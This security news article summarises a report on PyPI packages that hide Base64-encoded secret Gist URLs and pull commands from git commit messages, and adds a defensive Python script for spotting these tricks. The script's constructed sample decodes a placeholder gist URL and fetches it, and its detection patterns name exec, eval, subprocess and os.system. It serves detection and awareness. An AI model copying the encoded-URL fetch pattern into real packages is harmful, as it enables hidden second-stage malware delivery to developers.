Malicious actors are adopting new tactics on GitHub, such as abusing secret Gists and delivering commands through git commit messages.
According to a report by ReversingLabs, threat actors have increasingly turned to the GitHub open-source development platform for hosting malware, signaling a shift in their strategies. Traditionally, threat actors have utilized legitimate public services like Dropbox, Google Drive, OneDrive, and Discord for hosting second-stage malware and evading detection tools.
One notable evolution in this trend is the abuse of GitHub Gists, with threat actors using both public and secret Gists as repositories for malicious content. Gists, intended as a way for developers to share code snippets, present a particular challenge because they can be shared easily, and secret Gists do not appear on the author's GitHub profile page.
The report highlights the identification of PyPI packages masquerading as network proxying libraries, including httprequesthub, pyhttpproxifier, libsock, libproxy, and libsocks5. These packages contained Base64-encoded URLs pointing to secret Gists hosted in throwaway GitHub accounts, with the Gists featuring Base64-encoded commands executed through malicious code.
Additionally, the exploitation of version control system features has been observed, with a PyPI package named easyhttprequest incorporating malicious code that extracts commands from git commit messages for execution on the system. This technique involves cloning a specific GitHub repository and checking for commit messages that trigger Python command execution.
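As an added illustration, not code from the ReversingLabs report, the following Python triage helper applies the two indicators described above: base64 literals in package source that decode to gist URLs, and commit messages that carry a (possibly base64-encoded) Python statement. The sample source, sample commit messages, the length threshold and the keyword list are constructed assumptions for the demonstration.

```python
import base64
import re

# Runs of base64 text long enough to hide a URL or a command (16 is an assumed threshold).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
GIST_URL = re.compile(r"https?://gist\.github(?:usercontent)?\.com/", re.I)
# Tokens suggesting a string is Python rather than free text (heuristic triage, not a verdict).
CODE_HINT = re.compile(r"\b(import|exec|eval|subprocess|os\.system)\b")

def decode_candidates(text):
    """Yield (token, decoded) for base64 runs that decode to printable ASCII."""
    for match in B64_RUN.finditer(text):
        token = match.group(0)
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if decoded.isprintable():
            yield token, decoded

def find_encoded_gist_urls(source):
    """Return gist URLs that appear only in base64 form inside package source."""
    return [dec for _, dec in decode_candidates(source) if GIST_URL.match(dec)]

def suspicious_commit_messages(messages):
    """Return (message, payload) pairs where the message, raw or after base64
    decoding, looks like a Python statement rather than a change description."""
    hits = []
    for msg in messages:
        if CODE_HINT.search(msg):
            hits.append((msg, msg))
            continue
        for _, dec in decode_candidates(msg):
            if CODE_HINT.search(dec):
                hits.append((msg, dec))
                break
    return hits

# Constructed sample package source: a base64 literal hiding a gist URL.
SAMPLE_SOURCE = '''
import base64, requests
_u = base64.b64decode("aHR0cHM6Ly9naXN0LmdpdGh1Yi5jb20vZXhhbXBsZS9hYmNkZWY=").decode()
payload = requests.get(_u).text
'''
# Constructed commit messages: two ordinary ones and one base64 blob encoding a Python statement.
SAMPLE_COMMITS = ["Fix typo in README", "Bump version to 1.0.2", "aW1wb3J0IG9zOyBvcy5nZXRjd2QoKQ=="]

if __name__ == "__main__":
    print(find_encoded_gist_urls(SAMPLE_SOURCE))
    for msg, payload in suspicious_commit_messages(SAMPLE_COMMITS):
        print(f"suspicious commit {msg!r} -> {payload!r}")
```

Legitimate commit messages can contain words like "import", so treat a hit as a prompt for review rather than a verdict.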
While GitHub has been used as command-and-control (C2) infrastructure in the past, the abuse of features like GitHub Gists and commit messages for command delivery represents a novel approach. The report emphasizes the need for heightened awareness and monitoring to detect and respond to these evolving tactics effectively.